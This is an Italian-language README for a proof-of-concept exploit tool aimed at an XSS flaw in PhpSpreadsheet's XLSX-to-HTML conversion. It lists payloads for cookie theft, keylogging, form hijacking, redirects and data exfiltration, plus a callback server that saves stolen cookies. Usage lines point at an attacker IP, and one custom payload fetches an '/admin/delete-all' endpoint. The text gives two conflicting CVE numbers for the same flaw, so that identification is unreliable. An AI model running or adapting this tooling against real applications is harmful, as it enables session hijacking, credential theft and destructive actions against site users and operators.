
Questo è un PoC/Exploit per la vulnerabilità XSS di PhpSpreadsheet CVE-2024-47875
Questa è una PoC per la CVE-2025-22131, una vulnerabilità di Cross-Site Scripting (XSS) in PhpSpreadsheet nelle versioni precedenti alla 2.2.2, 2.1.2 e 1.29.4. La vulnerabilità risiede nella funzione generateNavigation(), che non riesce a sanificare i nomi dei fogli durante la conversione da XLSX a HTML, consentendo l'iniezione di JavaScript dannoso.
CVE ID: CVE-2024-47875
Avviso GitHub: GHSA-79xx-vf93-p7cx
Versioni interessate: PhpSpreadsheet < 2.2.2, < 2.1.2, < 1.29.4
Autore: Roj
Licenza: MIT
Repository: Repo PoC
📄 Genera file XLSX dannosi con payload XSS personalizzabili
🛠️ Supporta più tipi di payload:
cookie_theft: Ruba i cookie di sessione
redirect: Reindirizza gli utenti a un sito controllato dall'attaccante
alert: Mostra un avviso di test per la PoC
keylogger: Cattura le sequenze di tasti
form_hijack: Intercetta l'invio dei moduli
data_exfil: Esfiltra dati da un endpoint specificato
🌐 Server HTTP integrato per catturare i callback dell'exploit
⬆️ Carica file XLSX dannosi su un endpoint di destinazione
💾 Salva i dati catturati (ad es. cookie) in un file JSON
🎨 Output terminale colorato per una migliore leggibilità
🔍 Logging verboso per il debug
python exploit.py -h
🚀 Esempi di utilizzo:
# Attacco di base per il furto di cookie
python3 exploit.py http://target.htb 10.10.16.50
# Endpoint di upload personalizzato
python3 exploit.py http://app.htb 10.10.16.50 -e /api/file-upload
# Diversi tipi di payload
python3 exploit.py http://target.com 10.10.16.50 -p keylogger
python3 exploit.py http://target.com 10.10.16.50 -p redirect
python3 exploit.py http://target.com 10.10.16.50 -p form_hijack
# Payload XSS personalizzato
python3 exploit.py http://target.com 10.10.16.50 --custom "<script>fetch('/admin/delete-all')</script>"
Spero di ricevere feedback, in bocca al lupo a tutti voi.